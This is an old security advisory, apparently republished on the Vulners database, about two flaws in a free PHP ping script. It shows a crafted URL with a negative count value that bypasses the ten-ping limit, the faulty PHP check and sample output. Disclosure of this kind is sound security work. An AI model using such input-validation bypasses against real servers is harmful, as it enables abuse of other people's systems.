Vulners
Lucene search
kapda-23.txt
` [KAPDA::#23] - The WorldsEnd.NET - Free Ping Script, written in PHP (2 vulns)
KAPDA New advisory
Vulnerable products : The WorldsEnd.NET - Free Ping Script
Vendor: http://www.theworldsend.net/
Risk: Low
Vulnerabilities: Restriction Bypass
Date :
--------------------
Found : Aug 2005
Vendor Contacted : N/A
Release Date : Jan 2006
About The WorldsEnd.NET - Free Ping Script :
--------------------
A simple php script for sending pings to remote hosts.
This script has a bad reputation because of a previous remote command execution bug.
Vulnerability:
--------------------
Vuln 1: the script allows to ping the server it is hosted on. 127.0.0.1
Vuln 2: the scripts only allows you to send 10 or 4 pings
Just look at the count value in the url
http://victim/ping.php?host=127.0.0.1&coun...&submit=Ping%21
Maximum for count is: 10
But because of a signed/unsigned integer overflow (script -> ping) and an extra programming error we can bypass that restriction.
Exploit:
--------------------
You can bypass the ping count restriction by just making the count value negative.
http://victim/ping.php?host=127.0.0.1&coun...&submit=Ping%21
This will bypass the restriction and allows you to send any amount of pings.
Just look at this code snippet from the script
// over count ?
If ($count > $max_count) <== HERE IS THE MISTAKE, IT DOENS'NT CHECK FOR NEGATIVE NUMBERS
{
echo 'Maximum for count is: '.$max_count;
echo '<a href="'.$self.'">Back</a>';
}
else
{
// replace bad chars
$host= preg_replace ("/[^A-Za-z0-9.]/","",$host); <== HERE IS THE FIX FOR THE REMOTE CODE EXECUTION BUG
echo '<body bgcolor="#FFFFFF" text="#000000"></body>';
echo("Ping Output:<br>");
echo '<pre>';
Ping Output:
Pinging 127.0.0.1 with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 50, Received = 50, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
Solution:
--------------------
No patch or fix exits
Original Advisory:
--------------------
http://www.kapda.ir/advisory-231.html
Credit :
--------------------
Discoverd by cvh [at} kapda.ir
Grtz to all members of KAPDA and GSO.
KAPDA - Computer Security Researchers Institute
http://www.KAPDA.ir
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Jan 2006 00:00Current
7.4High risk
Vulners AI Score7.4